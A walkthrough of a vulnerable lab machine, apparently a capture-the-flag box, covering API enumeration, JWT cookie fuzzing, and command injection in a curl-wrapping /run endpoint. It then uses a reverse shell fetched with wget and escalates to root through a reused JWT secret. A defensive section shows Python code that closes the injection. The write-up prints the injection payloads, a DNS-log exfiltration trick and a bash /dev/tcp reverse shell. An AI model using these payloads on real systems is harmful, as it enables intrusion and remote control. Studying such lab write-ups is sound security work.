# Lab setup

Download the VM and import it directly; it works out of the box.

IP: 192.168.1.137

# Penetration process

# Initial information gathering

```
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp   open  http    nginx 1.14.2
8080/tcp open  http    nginx 1.14.2
# http://192.168.1.137:8080/
[10:55:39] 200 -    2KB - /01
[10:55:39] 200 -    2KB - /1
[10:55:39] 200 -    2KB - /02
[10:55:39] 200 -    2KB - /04
[10:55:40] 200 -    2KB - /2
[10:55:41] 200 -    2KB - /4
[10:56:24] 405 -   64B  - /login
[10:56:40] 200 -   29B  - /registration
[10:56:41] 405 -  178B  - /run
[10:56:42] 500 -   37B  - /secret
[10:56:50] 200 -   17B  - /test
[10:56:54] 200 -  140B  - /users
```

Response from /users:

```json
{"users": [{"username": "patrick", "password": "$pbkdf2-sha256$29000$e0/J.V.rVSol5HxPqdW6Nw$FZJVgjNJIw99RIiojrT/gn9xRr9SI/RYn.CGf84r040"}]}
```

# API testing

Looking around, it is just a set of API endpoints, so I tested them in Burp Suite, guided by the responses.

I tried logging in with the account and password hash from /users, with no luck, so I registered an account first to see how things work. Sent the following request:

```http
POST /registration HTTP/1.1
Host: 192.168.1.137:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

username=1&password=1
```

Got the following response:

```http
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Sun, 05 May 2024 03:18:21 GMT
Content-Type: application/json
Content-Length: 355
Connection: close

{"message": "User 1 was created. Please use the login API to log in!", "access_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcxNDg3OTEwMSwianRpIjoiOGJkZGNhMmEtY2I3ZC00MmZjLTk3NzUtMGY4NjNhNTZlYTMxIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6IjEiLCJuYmYiOjE3MTQ4NzkxMDEsImV4cCI6MTcxNDg4MDAwMX0.FVCqQo9SJPzLQybBsVwCw4WAaZUtkIQR5j-Y0mwUy30"}
```

Now log in with this account:

```http
POST /login HTTP/1.1
Host: 192.168.1.137:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

username=1&password=1
```

This returns the access and refresh tokens:

```http
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Sun, 05 May 2024 03:28:37 GMT
Content-Type: application/json
Content-Length: 600
Connection: close

{"message": "Logged in as 1", "access_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcxNDg3OTcxNywianRpIjoiNjdhNGM1OGUtMTIwYS00NDYwLTg2OWMtODJmZTU2ZjMxODFlIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6IjEiLCJuYmYiOjE3MTQ4Nzk3MTcsImV4cCI6MTcxNDg4MDYxN30.5ipYzn89OxZoXKNv5BbXznQROQjGuICIYZMOVl89LVE", "refresh_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcxNDg3OTcxNywianRpIjoiNDhmOWQxZTMtNjg4ZC00YWQyLWI1NzctZjhhOTczNTcxOWFjIiwidHlwZSI6InJlZnJlc2giLCJzdWIiOiIxIiwibmJmIjoxNzE0ODc5NzE3LCJleHAiOjE3MTQ4ODMzMTd9.duC7xa7rPSjsLZpGu22Hw23t4jdDO1N5JgZapbAQidM"}
```

Now the run endpoint. From the hint it looks like RCE. Since the responses are JSON, I guessed the request body has to be JSON too; submitting {"url":"127.0.0.1:8080"} showed it also wants a secret key, which immediately brought the secret page to mind.

Opening it gave a 500. Combined with the earlier information it must need the cookie, but I didn't know the cookie field name, so I had to fuzz it.

It shouldn't be too complicated, and in the end the field name turned out to be access_token_cookie. Sending the cookie returned secret_key: commandexecutionissecret

```http
GET /secret HTTP/1.1
Host: 192.168.1.137:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Cookie: access_token_cookie=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcxNDg3OTcxNywianRpIjoiNjdhNGM1OGUtMTIwYS00NDYwLTg2OWMtODJmZTU2ZjMxODFlIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6IjEiLCJuYmYiOjE3MTQ4Nzk3MTcsImV4cCI6MTcxNDg4MDYxN30.5ipYzn89OxZoXKNv5BbXznQROQjGuICIYZMOVl89LVE
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
```

```http
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Sun, 05 May 2024 03:35:25 GMT
Content-Type: application/json
Content-Length: 61
Connection: close
Set-Cookie: access_token_cookie=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcxNDg4MDEyNSwianRpIjoiZTlmZWQ0ZjUtZjM2Ny00NWQwLWI4ZTgtZjY1YzMwZmRlN2NmIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6IjEiLCJuYmYiOjE3MTQ4ODAxMjUsImV4cCI6MTcxNDg4MTAyNX0.z-n754xqTpvCmTqnbZNTePOgmkNVZW8MNxWCjeJ9-Uk; Secure; HttpOnly; Path=/

{"ip-address": "", "secret_key": "commandexecutionissecret"}
```

Then go back to the run endpoint, add secret_key, and it executes:

```http
POST /run HTTP/1.1
Host: 192.168.1.137:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 109

{"url":"127.0.0.1:80",
"secret_key":"commandexecutionissecret"}
```

# RCE

After running it, the output showed that the endpoint runs a curl command, which points to command injection, so I tried splicing into the command line:

```json
{"url":"$(whoami).fag8yp.dnslog.cn","secret_key":"commandexecutionissecret"}
```

Command execution works. I tried a reverse shell and it got blocked outright, so there is probably keyword filtering. Love it.

Upload a shell.sh instead and call back from that.

shell.sh is as follows:

```bash
#!/bin/bash
bash -i >& /dev/tcp/192.168.1.129/4444 0>&1
```

The commands submitted were:

```json
{"url":"`wget http://192.168.1.129/shell.txt -O shell.sh`.fag8yp.dnslog.cn","secret_key":"commandexecutionissecret"}
{"url":"`chmod +x shell.sh`.fag8yp.dnslog.cn","secret_key":"commandexecutionissecret"}
{"url":"`./shell.sh`.fag8yp.dnslog.cn","secret_key":"commandexecutionissecret"}
```

OK folks, the shell came back.
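The root cause on the /run endpoint is that the user-supplied `url` is pasted into a shell command line, so `$(...)` and backticks are evaluated by the shell before curl ever runs, and the keyword filter the author ran into only blocks particular strings, not the mechanism. The following is an added example, not code from the lab application: it shows the hardened shape of such an endpoint in Python, which is the language the app's `app.config[...]` lines suggest. The fix is twofold: validate the target against an allowlist and rebuild the URL from parsed components rather than the raw string, then run curl with an argv list and `shell=False` so that no shell is involved at all. The curl options, timeout and hostname rules are design choices made for this example; the test inputs reuse the writeup's own `127.0.0.1:80` and the `$(whoami).fag8yp.dnslog.cn` payload.

```python
import re
import subprocess
from typing import Optional
from urllib.parse import urlsplit, urlunsplit

# Only http/https targets: the endpoint wraps curl, nothing else makes sense here.
ALLOWED_SCHEMES = {"http", "https"}
# DNS labels or dotted IPv4 only (letters, digits, hyphens, dots). Shell
# metacharacters cannot pass this, but the allowlist is defence in depth; what
# actually removes the injection is running curl without a shell (run_target).
HOSTNAME_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?:\.[A-Za-z0-9-]{1,63})*\.?$")
CURL_TIMEOUT_SECONDS = 5


def validate_target(user_url: str) -> Optional[str]:
    """Return a canonical URL rebuilt from parsed components, or None if rejected."""
    if "://" not in user_url:
        # the lab accepts a bare host[:port] such as "127.0.0.1:80"; default it to http
        user_url = "http://" + user_url
    try:
        parts = urlsplit(user_url)
        hostname, port = parts.hostname, parts.port  # .port raises on a non-numeric port
    except ValueError:
        return None
    if parts.scheme not in ALLOWED_SCHEMES or not hostname or not HOSTNAME_RE.match(hostname):
        return None
    netloc = hostname if port is None else f"{hostname}:{port}"
    # userinfo and fragment are dropped; what goes out is re-serialised from the
    # parser's view of the input, never the raw string the client sent
    return urlunsplit((parts.scheme, netloc, parts.path, parts.query, ""))


def build_curl_argv(user_url: str) -> list:
    """argv for curl as a list: each element is one argument and is never re-parsed by a shell."""
    target = validate_target(user_url)
    if target is None:
        raise ValueError("target rejected by allowlist")
    # "--" ends option parsing, so a target beginning with "-" cannot become a curl flag
    return ["curl", "--silent", "--show-error", "--max-time", str(CURL_TIMEOUT_SECONDS), "--", target]


def run_target(user_url: str) -> subprocess.CompletedProcess:
    """Run curl with no shell. The injectable pattern this replaces is building
    one string, e.g. subprocess.run(f"curl {url}", shell=True) or os.system(...)."""
    return subprocess.run(
        build_curl_argv(user_url),
        shell=False,  # $(...), backticks, ';' and '|' are plain bytes in an argument here
        capture_output=True,
        timeout=CURL_TIMEOUT_SECONDS + 1,
        check=False,
    )
```

With this in place the writeup's `$(whoami).…` and backtick payloads are rejected before curl is reached, and even a hostname that somehow contained metacharacters would be handed to curl as a single argument rather than interpreted. Note what this does not do: the allowlist still accepts `127.0.0.1` and other internal addresses, so reaching internal services through the endpoint (which the author's own `127.0.0.1:80` probe demonstrates) is a separate issue that needs its own destination policy.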

# Privilege escalation

Dig through the directories:

```python
app.config['SECRET_KEY'] = 'snakeoilisnotgoodforcorporations'
app.config['JWT_SECRET_KEY'] = 'NOreasonableDOUBTthisPASSWORDisGOOD
```

Two candidate passwords. The second one turned out to be the password of the account the shell runs as, so a plain sudo su does it.

That gives root.

# Summary

API testing + command execution.

JWT_SECRET_KEY is the key used for JSON Web Tokens (JWT). When JWT is used for authentication and authorization, a key is needed to sign and verify the tokens. It just so happens that here it is also the password of the patrick account...